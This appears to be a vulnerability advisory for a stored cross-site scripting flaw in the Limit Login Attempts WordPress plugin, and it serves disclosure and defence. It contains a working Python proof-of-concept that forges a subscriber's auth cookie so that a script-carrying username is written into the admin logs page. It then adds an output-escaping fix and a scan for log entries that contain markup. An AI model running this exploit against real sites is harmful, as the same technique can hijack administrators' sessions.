wpexploit | Marc Montpas | WPEX-ID:461CBCCA-AED7-4C92-BA35-EBABF4FCD810
History: Apr 10, 2023 - 12:00 a.m.

Limit Login Attempts < 1.7.2 - Subscriber+ Stored XSS

Published: 2023-04-10 00:00:00
Author: Marc Montpas
Tags: wordpress, subscriber, vulnerability, stored xss, security issue, cross-site scripting, login attempts

EPSS: 0.001 (percentile 23.5%)

The plugin does not sanitize and escape usernames when outputting them back in the logs dashboard, which could allow any authenticated user, such as a subscriber, to perform Stored Cross-Site Scripting attacks.

import requests
import sys
import re

if len(sys.argv) != 4:
    print('USAGE: python %s <target_url> <user_login> <user_pass>' % (sys.argv[0],))
    sys.exit(1)

url = sys.argv[1].rstrip('/')

with requests.Session() as s:
    print('Logging in...')
    # Log into WordPress using our Subscriber account
    res = s.post(
        url + '/wp-login.php',
        headers={'Cookie': 'wordpress_test_cookie=WP Cookie check'},
        data={'log': sys.argv[2], 'pwd': sys.argv[3], 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': 1})
    # Send 5 corrupted cookies with malicious usernames in them
    print('Sending corrupted cookies 5 times..')
    for cookie in list(s.cookies.keys()):
        if re.match(r'wordpress_[0-9a-f]+', cookie):
            # Swap our username inside the auth cookie for the payload; the plugin
            # records the username from the failed cookie check in its log
            malicious_payload = s.cookies.get(name=cookie, path='/').replace(sys.argv[2], 'MALICIOUS_USERNAME<svg/onload=alert(1)//>')
            s.cookies.set(name=cookie, value=None, path='/')  # value=None removes the original cookie
            s.cookies.set(name=cookie, value=malicious_payload, path='/')

    # Each request with the corrupted cookie is a failed cookie login and gets logged
    for i in range(5):
        s.get(url + '/wp-admin/')

print(f'View limit-login-attempts logs now at {url}/wp-admin/options-general.php?page=limit-login-attempts')
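The fix the advisory implies is escaping on output. The following is an added illustration, not the plugin's code and not part of the original record: a stand-in for the lockout-log dashboard row, rendered once the way the advisory describes (username interpolated into HTML unescaped) and once with every untrusted value escaped, plus a small check a site owner could run over stored log entries to find usernames that carry markup. The log shape, the function names and the sample entries are constructed for the example; the second username is the payload from the PoC above. `html.escape` stands in for WordPress's `esc_html()`.

```python
import html
import re

# Constructed sample of lockout-log entries: (client IP, attempted username,
# attempt count). Shape is assumed for the example, not taken from the plugin.
SAMPLE_LOG = [
    ("203.0.113.7", "admin", 4),
    ("198.51.100.22", "MALICIOUS_USERNAME<svg/onload=alert(1)//>", 5),
    ("192.0.2.15", "editor", 2),
]


def render_row_vulnerable(ip, username, count):
    """Row rendered as the advisory describes: the username goes into the
    HTML without escaping, so any markup in it becomes live in the admin page."""
    return f"<tr><td>{ip}</td><td>{username}</td><td>{count}</td></tr>"


def render_row_hardened(ip, username, count):
    """Same row with each untrusted value escaped at the point of output.
    html.escape here; esc_html() is the WordPress equivalent."""
    return (
        f"<tr><td>{html.escape(ip)}</td>"
        f"<td>{html.escape(username)}</td>"
        f"<td>{html.escape(str(count))}</td></tr>"
    )


def render_table(rows, render_row):
    """Render the whole log table with the given row renderer."""
    return "<table>" + "".join(render_row(*row) for row in rows) + "</table>"


def contains_markup(value):
    """True when the value holds characters that can open a tag or break out
    of an attribute; WordPress usernames normally never contain these."""
    return re.search(r"[<>\"']", value) is not None


def suspicious_entries(rows):
    """Return (ip, username) for every stored entry whose username carries markup;
    a hit means the stored log already holds an XSS attempt."""
    return [(ip, username) for ip, username, _ in rows if contains_markup(username)]


if __name__ == "__main__":
    print("vulnerable:", render_table(SAMPLE_LOG, render_row_vulnerable))
    print("hardened:  ", render_table(SAMPLE_LOG, render_row_hardened))
    print("suspicious:", suspicious_entries(SAMPLE_LOG))
```

Escaping at output is the durable fix because the username reaches the log from a forged cookie, not from the registration form, so input sanitization alone never sees it; the `suspicious_entries` scan is only useful for finding attempts already stored by the unpatched version.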
